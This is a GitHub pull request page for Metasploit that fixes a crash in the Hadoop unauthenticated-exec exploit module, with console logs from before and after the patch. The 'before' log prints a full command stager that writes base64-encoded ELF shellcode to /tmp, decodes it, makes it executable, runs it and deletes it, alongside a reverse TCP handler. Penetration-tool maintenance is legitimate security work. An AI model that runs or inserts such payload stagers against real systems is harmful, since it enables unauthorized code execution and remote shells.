Fix #12156, NoMethodError in hadoop exploit. #12175

Merged
merged 1 commit into from
Aug 8, 2019

@Green-m Green-m commented Aug 8, 2019

Thanks to @wvu-r7 for this patch!
Fix #12156

Before

msf5 exploit(linux/http/hadoop_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.8.100:4444
[*] Sending Command
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgIZGgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/nuCXw.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/NJTbh' < '/tmp/nuCXw.b64' ; chmod +x '/tmp/NJTbh' ; '/tmp/NJTbh' ; rm -f '/tmp/NJTbh' ; rm -f '/tmp/nuCXw.b64'"]
[-] The connection timed out (12.4.3.2:8088).
[-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
[*] Exploit completed, but no session was created.

After patch

msf5 exploit(linux/http/hadoop_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.8.100:4444
[*] Sending Command
[-] Exploit aborted due to failure: not-found: Could not retrieve application-id
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hadoop_unauth_exec) >

@wvu wvu left a comment

Thank you, @Green-m!

@wvu wvu self-assigned this Aug 8, 2019
@wvu wvu merged commit 6cf0ff0 into rapid7:master Aug 8, 2019
wvu added a commit that referenced this pull request Aug 8, 2019

wvu commented Aug 8, 2019

Release Notes

The NoMethodError crash in the exploit/linux/http/hadoop_unauth_exec module has been resolved.

wvu commented Aug 8, 2019

A tiny whitespace fix in b5fd9b4.

I appreciate you, @Green-m! (Stealing @ccondon-r7's catchphrase there. ;)

@Green-m Green-m deleted the issue/hadoop_nomethod branch August 8, 2019 05:35
@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Aug 20, 2019
Labels
bug module rn-fix release notes fix
Development

Successfully merging this pull request may close these issues.

NoMethodError?
3 participants